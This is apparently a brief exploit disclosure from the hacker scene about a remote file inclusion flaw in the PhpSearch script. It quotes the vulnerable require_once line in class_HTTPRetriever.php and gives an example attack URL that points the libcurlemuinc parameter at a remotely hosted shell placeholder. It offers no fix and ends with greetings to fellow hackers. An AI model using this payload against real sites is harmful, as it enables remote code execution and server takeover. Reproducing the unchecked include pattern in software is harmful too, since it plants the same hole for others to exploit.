Script : PhpSearch Bug : Remote File Inclusion Author : SekoMirza Company : http://www.hawkententerprises.org Download : http://www.hawkenterprises.org/dev/phpsearch.zip Dork : not yet _____________________________________________ Where : phpsearch/utils/class_HTTPRetriever.php Bug : if (is_readable($libcurlemuinc)) require_once($libcurlemuinc); Explanation : if class_HTTPRetriever.php is readable you can execute malicious code. Example : http://www.site.com/[path]/utils/class_HTTPRetriever.php?libcurlemuinc=[Sh3LL] _____________________________________________ Thanx to : Str0ke , Hypn0sis , Earnk Kazno , Shadow , Ph.0 , Class 3rr0r , MadWorM , and all hackers
